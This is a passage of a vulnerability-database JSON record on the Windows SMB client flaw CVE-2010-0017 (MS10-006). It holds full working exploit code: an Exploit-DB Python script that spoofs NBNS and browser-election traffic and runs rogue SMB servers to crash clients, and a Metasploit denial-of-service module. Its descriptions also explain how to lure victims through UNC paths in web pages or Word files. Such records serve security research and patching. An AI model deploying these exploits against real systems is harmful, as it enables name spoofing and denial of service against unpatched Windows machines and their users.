SMB\u5ba2\u6237\u7aef\u5b9e\u73b0\u7ade\u4e89\u6761\u4ef6\u6f0f\u6d1e\uff08MS10-006\uff09", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0017"], "modified": "2010-02-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19147", "id": "SSV:19147", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "exploitdb": [{"lastseen": "2016-02-01T16:04:15", "description": "Proof of Concept for MS10-006 SMB Client-Side Bug. CVE-2010-0017. Dos exploit for windows platform", "published": "2010-04-16T00:00:00", "type": "exploitdb", "title": "Windows - SMB Client-Side Bug Proof of Concept MS10-006", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0017"], "modified": "2010-04-16T00:00:00", "id": "EDB-ID:12258", "href": "https://www.exploit-db.com/exploits/12258/", "sourceData": "# More Info: http://g-laurent.blogspot.com/2010/04/turning-smb-client-bug-to-server-side.html\r\nimport sys,SocketServer,socket,threading,time,random\r\nfrom random import *\r\nfrom time import sleep\r\nfrom socket import *\r\n\r\nif len(sys.argv)<=2:\t\r\n sys.exit('Usage: pwn.py Your_ip Broadcast_ip\\n\\r Example: pwn.py 10.0.0.1 10.0.0.255')\r\n\r\nip = str(sys.argv[1])\r\nnbns = str(sys.argv[2]),137\r\nbrowser = str(sys.argv[2]),138\r\n\r\n\r\nelec = \"\\x42\\x4f\\x00\"\r\ndomainmasterbro = \"\\x42\\x4c\\x00\"\r\n\r\n##BROWSER election request\r\nbrowserelect = [chr(int(a, 16)) for a in \"\"\"\r\n11 02 bd 82 c0 a8 00 96 00 8a 00 ae 00 00 20 46\r\n47 45 4e 45 43 45 50 46 49 43 41 43 41 43 41 43\r\n41 43 41 43 41 43 41 43 41 43 41 43 41 41 41 00\r\n20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46\r\n46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42\r\n4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00\r\n00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n00 00 11 00 00 14 00 00 00 00 00 00 00 00 00 e8\r\n03 00 00 00 00 00 00 00 00 14 00 56 00 03 00 01\r\n00 01 00 02 00 25 00 5c 4d 41 49 4c 53 4c 4f 54\r\n5c 42 52 4f 57 53 45 00 08 09 a8 0f 01 20 1b e9\r\na5 00 00 00 00 00 56 4d 42 4f 58 00\"\"\".split()]\r\n\r\n##Local Master Announcement\r\nbrowsermaster = [chr(int(a, 16)) for a in \"\"\"\r\n11 02 bd 2c c0 a8 00 96 00 8a 00 bb 00 00 20 45\r\n4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43\r\n41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00\r\n20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46\r\n46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42\r\n4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00\r\n00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n00 00 11 00 00 21 00 00 00 00 00 00 00 00 00 e8\r\n03 00 00 00 00 00 00 00 00 21 00 56 00 03 00 01\r\n00 00 00 02 00 32 00 5c 4d 41 49 4c 53 4c 4f 54\r\n5c 42 52 4f 57 53 45 00 0f 00 80 fc 0a 00 4d 41\r\n53 54 45 52 00 00 00 00 00 00 00 00 00 00 00 06\r\n2b 10 84 00 00 0f 01 55 aa 00\"\"\".split()]\r\n\r\nresetcache = [chr(int(a, 16)) for a in \"\"\"\r\n11 0a 6b a8 c0 a8 0a 66 00 8a 00 c5 00 00 20 45\r\n4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43\r\n41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00\r\n20 41 42 41 43 46 50 46 50 45 4e 46 44 45 43 46\r\n43 45 50 46 48 46 44 45 46 46 50 46 50 41 43 41\r\n42 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00\r\n00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n00 00 11 00 00 2b 00 00 00 00 00 00 00 00 00 00\r\n00 00 00 00 00 00 00 00 00 2b 00 56 00 03 00 01\r\n00 01 00 02 00 3c 00 5c 4d 41 49 4c 53 4c 4f 54\r\n5c 42 52 4f 57 53 45 00 0e 02\"\"\".split()]\r\n\r\nresetlbm = [chr(int(a, 16)) for a in \"\"\"\r\n11 0a 6b a8 c0 a8 0a 66 00 8a 00 c5 00 00 20 45\r\n4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43\r\n41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00\r\n20 41 42 41 43 46 50 46 50 45 4e 46 44 45 43 46\r\n43 45 50 46 48 46 44 45 46 46 50 46 50 41 43 41\r\n42 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00\r\n00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n00 00 11 00 00 2b 00 00 00 00 00 00 00 00 00 00\r\n00 00 00 00 00 00 00 00 00 2b 00 56 00 03 00 01\r\n00 01 00 02 00 3c 00 5c 4d 41 49 4c 53 4c 4f 54\r\n5c 42 52 4f 57 53 45 00 0e 01\"\"\".split()]\r\n\r\n##Browser Master annoncement\r\nmasterannon = [chr(int(a, 16)) for a in \"\"\"\r\n11 02 bd 2c c0 a8 00 96 00 8a 00 bb 00 00 20 45\r\n4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43\r\n41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00\r\n20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46\r\n46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42\r\n4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00\r\n00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n00 00 11 00 00 21 00 00 00 00 00 00 00 00 00 e8\r\n03 00 00 00 00 00 00 00 00 21 00 56 00 03 00 01\r\n00 00 00 02 00 32 00 5c 4d 41 49 4c 53 4c 4f 54\r\n5c 42 52 4f 57 53 45 00 0d 4d 41 53 54 45 52 00\"\"\".split()]\r\n\r\nregmsbrowse = [chr(int(a, 16)) for a in \"\"\"\r\nbe 6e 29 10 00 01 00 00 00 00 00 01 20 41 42 41\r\n43 46 50 46 50 45 4e 46 44 45 43 46 43 45 50 46\r\n48 46 44 45 46 46 50 46 50 41 43 41 42 00 00 20\r\n00 01 c0 0c 00 20 00 01 00 04 93 e0 00 06 80 00\r\nc0 a8 00 96\"\"\".split()]\r\n\r\n##NBNS Spoofing\r\nspoof = [chr(int(a, 16)) for a in \"\"\"\r\n08 f3 85 80 00 00 00 01 00 00 00 00 20 46 48 45\r\n50 46 43 45 4c 45 48 46 43 45 50 46 46 46 41 43\r\n41 43 41 43 41 43 41 43 41 43 41 42 4e 00 00 20\r\n00 01 00 04 93 e0 00 06 00 00\"\"\".split()]\r\n\r\ndef nametid(data,packet,service):\r\n pack = packet[:]\r\n pack[2:4]=data[2:4] ##Transaction ID\r\n pack[4:8] = inet_aton(str(sys.argv[1])) ##OurIP Addres\r\n pack[48:82]=data[48:79]+service ##Service/domain name\r\n return pack\r\n\r\ndef nametidrand(data,packet,service):\r\n pack = packet[:]\r\n pack[2:4]= \"\\x80\"+str(chr(choice(range(256)))) ##Transaction ID\r\n pack[4:8] = inet_aton(str(sys.argv[1])) ##OurIP Addres\r\n pack[48:82]=data[48:79]+service ##Service/domain name\r\n return pack\r\n\r\ndef addipbrow(packet):\r\n pack = packet[:]\r\n pack[4:8] = inet_aton(str(sys.argv[1]))\r\n return pack\r\n\r\ndef addipnb(packet):\r\n pack = packet[:]\r\n pack[len(packet)-4:] = inet_aton(str(sys.argv[1]))\r\n return pack\r\n\r\ndef sockbroad(packet,host):\r\n s = socket(AF_INET,SOCK_DGRAM)\r\n s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)\r\n s.sendto(packet,host)\r\n\r\nclass BROWSER(SocketServer.BaseRequestHandler):\r\n \r\n def server_bind(self):\r\n self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)\r\n self.socket.bind(self.server_address)\r\n\r\n def handle(self):\r\n ip = inet_aton(str(sys.argv[1]))\r\n request, socket = self.request\r\n data = request\r\n print \"From:\", self.client_address\r\n if data[168] == \"\\x01\" or data[168] == \"\\x0f\" or data[168] == \"\\x08\" and self.client_address[0] != sys.argv[1]:\r\n\r\n sockbroad(''.join(addipbrow(resetcache)),browser)\r\n print \"[+]LMB cache Successfully Reseted\"\r\n\r\n sockbroad(''.join(addipbrow(resetlbm)),browser)\r\n print \"[+]LMB Successfully killed\"\r\n\r\n for x in range(4):\r\n sockbroad(''.join(nametid(data,browserelect, elec)),browser)\r\n sleep(0.8)\r\n print \"[+] Election Won !\\n\"\r\n\r\n for x in range(4):\r\n sleep(0.5)\r\n sockbroad(''.join(addipnb(regmsbrowse)),nbns)\r\n print \"[+]Now Register __MSBROWSE__ :] \"\r\n \r\n sockbroad(''.join(nametidrand(data,browsermaster, elec)),browser)\r\n sleep(1)\r\n sockbroad(''.join(nametidrand(data,masterannon, domainmasterbro)),browser)\r\n print \"[+] Now LBM ! \\n\"\r\n\r\n#NBNS SPOOF;\r\n\r\ndef namenbnstid(data,packet):\r\n pack = packet[:]\r\n pack[0:2]=data[0:2]##Transaction ID\r\n pack[12:48]=data[12:48]##Netbios name\r\n return pack\r\n\r\nclass NBNS(SocketServer.BaseRequestHandler):\r\n \r\n def server_bind(self):\r\n self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)\r\n self.socket.bind(self.server_address)\r\n\r\n def handle(self):\r\n request, socket = self.request\r\n data = request\r\n print \"From:\", self.client_address\r\n #Hijack\r\n if data[2:4] == \"\\x01\\x10\": \r\n buffer0 = ''.join(namenbnstid(data,spoof))+inet_aton(str(sys.argv[1]))\r\n socket.sendto(buffer0, self.client_address)\r\n print \"Fake NBNS Response sended\\n\"\r\n\r\npacketnego = (\r\n##SMB Header\r\n\"\\x00\\x00\\x00\\x7f\" #Netbios length\r\n\"\\xff\\x53\\x4d\\x42\" #Server type\r\n\"\\x72\" #Operation/Command\r\n\"\\x00\\x00\\x00\\x00\" #Statut command OK Success \r\n\"\\x98\" #Flag 0x98\r\n\"\\x53\\xc8\" #Flag 0xc853\r\n\"\\x00\\x00\" #PID High\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" #Signature\r\n\"\\x00\\x00\" #Reserved\r\n\"\\x00\\x00\" #Tree ID\r\n\"\\xff\\xfe\" #Process ID\r\n\"\\x00\\x00\" #User ID\r\n\"\\x00\\x00\" #Multiplex ID\r\n##SMB Header end\r\n\r\n##Negotiate Protocol\r\n\"\\x11\" #Word count\r\n\"\\x05\\x00\" #Choosen dialect, no-5 from client list\r\n\"\\x03\" #Security mode\r\n\"\\x41\\x41\" #Max MPX count\r\n\"\\x41\\x41\" #Max VCs\r\n##Issue\r\n\"\\x03\\x00\\x00\\x00\" #Max buffer size; The issue is located here, as we specify an only 4 bytes max buffer length is this example.\r\n#Usually a server would provide a 4356 max buffer size.\r\n\"\\x41\\x41\\x41\\x41\" #Max raw buffer\r\n\"\\x00\\x00\\x00\\x00\" #Session key\r\n\"\\xfc\\xe3\\x01\\x80\" #Capabilities\r\n\"\\xea\\xb1\\x6e\\x18\\x11\\x62\\xca\\x01\" #System Time\r\n\"\\x2c\\x01\" #Server timezone\r\n\"\\x00\" #Key length\r\n\"\\x3a\\x00\" #Byte count\r\n#Server GUID\r\n\"\\x68\\x52\\x38\\x38\\xf2\\xe3\\x9f\\x4f\\x94\\x26\\xbd\\xcb\\xca\\x2e\\x28\\x9a\" \r\n#Security Blob\r\n\"\\x60\\x28\\x06\\x06\\x2b\\x06\\x01\\x05\\x05\\x02\\xa0\\x1e\\x30\\x1c\\xa0\\x1a\"\r\n\"\\x30\\x18\\x06\\x0a\\x2b\\x06\\x01\\x04\\x01\\x82\\x37\\x02\\x02\\x1e\\x06\\x0a\"\r\n\"\\x2b\\x06\\x01\\x04\\x01\\x82\\x37\\x02\\x02\\x0a\"\r\n##Negotiate Protocol end\r\n)\r\n\r\nclass MS10_006(SocketServer.BaseRequestHandler):\r\n\r\n def server_bind(self):\r\n self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)\r\n self.socket.bind(self.server_address)\r\n\r\n def handle(self): \r\n print \"From:\", self.client_address\r\n data = self.request.recv(256)\r\n if data[0] == \"\\x81\":\r\n buffer0 = \"\\x82\\x00\\x00\\x00\" \r\n self.request.send(buffer0)\r\n print \"Session Positive Response sended\\n\"\r\n data = self.request.recv(1024)\r\n if data[8] == \"\\x72\": \r\n self.request.send(packetnego)\r\n print \"Negotiate Response sended kaboom !\\n\"\r\n data = self.request.recv(1024)\r\n\r\n\r\ndef serve_thread_udp(host, port, handler):\r\n server = SocketServer.UDPServer((host, port), handler)\r\n server.serve_forever()\r\n\r\ndef serve_thread_tcp(host, port, handler):\r\n server = SocketServer.TCPServer((host, port), handler)\r\n server.serve_forever()\r\n\r\nSocketServer.TCPServer.allow_reuse_address = 1\r\nthreading.Thread(target=serve_thread_tcp,args=('', 139,MS10_006)).start()\r\nthreading.Thread(target=serve_thread_tcp,args=('', 445,MS10_006)).start()\r\nthreading.Thread(target=serve_thread_udp,args=('', 137,NBNS)).start()\r\nthreading.Thread(target=serve_thread_udp,args=('', 138,BROWSER)).start()", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/12258/"}], "metasploit": [{"lastseen": "2020-08-18T02:11:26", "description": "This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\\HOST\\share\\something) into a web page if the target is using Internet Explorer, or a Word document otherwise.\n", "published": "2010-04-15T16:08:27", "type": "metasploit", "title": "Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0017"], "modified": "2017-08-25T01:38:44", "id": "MSF:AUXILIARY/DOS/WINDOWS/SMB/MS10_006_NEGOTIATE_RESPONSE_LOOP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TcpServer\n include Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop',\n 'Description' => %q{\n This module exploits a denial of service flaw in the Microsoft\n Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger\n this bug, run this module as a service and forces a vulnerable client\n to access the IP of this system as an SMB server. This can be accomplished\n by embedding a UNC path (\\\\HOST\\share\\something) into a web page if the\n target is using Internet Explorer, or a Word document otherwise.\n },\n 'References' =>\n [\n ['CVE', '2010-0017'],\n ['OSVDB', '62244'],\n ['MSB', 'MS10-006'],\n ['URL', 'http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html']\n ],\n 'Author' => [ 'Laurent Gaffie <laurent.gaffie[at]gmail.com>', 'hdm' ],\n 'License' => MSF_LICENSE\n ))\n\n register_options([\n OptPort.new('SRVPORT', [ true, \"The SMB port to listen on\", 445 ])\n ])\n end\n\n def run\n print_status(\"Starting the malicious SMB service...\")\n print_status(\"To trigger, the vulnerable client should try to access: \\\\\\\\#{Rex::Socket.source_address('1.2.3.4')}\\\\Shared\\\\Anything\")\n exploit\n end\n\n def on_client_connect(client)\n client.get_once(-1, 1)\n req = \"\\x00\\x00\\x00\\x9a\" + # 9e is the real length of the response\n \"\\xfe\\x53\\x4d\\x42\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\" +\n \"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\n \"\\x41\\x00\\x01\\x00\\x02\\x02\\x00\\x00\\x30\\x82\\xa4\\x11\\xe3\\x12\\x23\\x41\" +\n \"\\xaa\\x4b\\xad\\x99\\xfd\\x52\\x31\\x8d\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\" +\n \"\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\xcf\\x73\\x67\\x74\\x62\\x60\\xca\\x01\" +\n \"\\xcb\\x51\\xe0\\x19\\x62\\x60\\xca\\x01\\x80\\x00\\x1e\\x00\\x20\\x4c\\x4d\\x20\" +\n \"\\x60\\x1c\\x06\\x06\\x2b\\x06\\x01\\x05\\x05\\x02\\xa0\\x12\\x30\\x10\\xa0\\x0e\" +\n \"\\x30\\x0c\\x06\\x0a\\x2b\\x06\\x01\\x04\\x01\\x82\\x37\\x02\\x02\\x0a\"\n client.put(req)\n client.get_once(-1, 1)\n client.close\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-0270", "CVE-2010-0017", "CVE-2010-0476", "CVE-2010-0016", "CVE-2010-0269", "CVE-2010-0477", "CVE-2009-3676"], "description": "Memory corruptions, race conditions.", "edition": 1, "modified": "2010-04-15T00:00:00", "published": "2010-04-15T00:00:00", "id": "SECURITYVULNS:VULN:10604", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10604", "title": "Microsoft SMB client multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}